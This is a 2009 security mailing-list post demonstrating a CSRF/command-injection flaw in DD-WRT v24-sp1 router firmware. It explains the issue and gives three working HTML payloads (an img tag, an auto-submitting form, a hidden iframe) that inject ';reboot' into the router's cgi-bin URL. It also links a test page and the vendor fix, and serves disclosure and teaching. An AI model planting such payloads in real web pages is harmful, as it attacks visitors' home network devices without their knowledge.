PaulDotCom mailing list archives
DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 )
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 25 Jul 2009 17:35:01 -0400
HTML clipboard
I heard Carlos talk about it, so I started to work on a writeup, which I'll
post to my site shortly.* Carlos, thanks for the idea.
*
I was interested in giving a reall world example of a CSRF attack,
similar to the ones I mentioned in my OWASP Top 5
video<http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>,
and maybe use it against a piece of internal equipment that is behind a NAT
box. Then I heard about Carlos Perez
write-up<http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>on
using Metasploit against a vulnerability in the DD-WRT v24-sp1
firmware.
I thought this would be a great way to demo the concept of using CSRF/XSS
against hardware behind a NAT, especially since I've done a video on
installing DD-WRT
before<http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>.
Some people thing it's not a big deal since the attack request has to come
from an internal source, but they don't think about the fact that CSRF can
make the attack come from an internal source. Granted, this may not be
considered a true CSRF from the stand point that you don't have to have
authenticated against your DD-WRT v24-sp1 router, but it works much the same
way. Carlos' demo shows using Metasplot to open a shell on the router, then
do some other messing around, I'll just show how this vulnerability could be
used to reboot the router just using html (there are far more deviant things
you could do). For the most part this attack essentially amounts to pointing
the browser at http://ip-of-router/cgi-bin/*;*some-command . Since the
default IP for most home NAT routers is 192.168.1.1, this is a pretty easy
attack that could be pulled off against people who browse a page that the
attacker controls. The attacker would not have to explicitly have the
victim go to http://ip-of-router/cgi-bin/*;*some-command to pull off the
attack, there are plenty of ways to make a browser automatically make the
reques, for example:
* *
*IMG get:*
<img src=*"http://192.168.1.1/cgi-bin/;reboot"*>
* *
*Post method:*
<form name=*"csrfform"* method=*"post"* action=*"
http://192.168.1.1/cgi-bin/;reboot"*>* *<input type=*'hidden'* name=*
'input_from_form'* value=*"Test of of auto submitted form."*>* *</form>* *
<script> document.csrfform.submit*()* </script>* *
*IFRAME Get:*
<iframe src=*"http://192.168.1.1/cgi-bin/;reboot"* style=*"width:0px;
height:0px; border: 0px"*></iframe>
If you would like to test this code against your DD-WRT v24-sp1 click the
link below:
DD-WRT test page, only click if you want your router to
reboot<http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm>
For information on the fix:
http://www.dd-wrt.com
Guess its time to patch.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090725/26b4803a/attachment.htm
Current thread:
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Adrian Crenshaw (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Carlos Perez (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Adrian Crenshaw (Jul 25)
- DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742 ) Carlos Perez (Jul 25)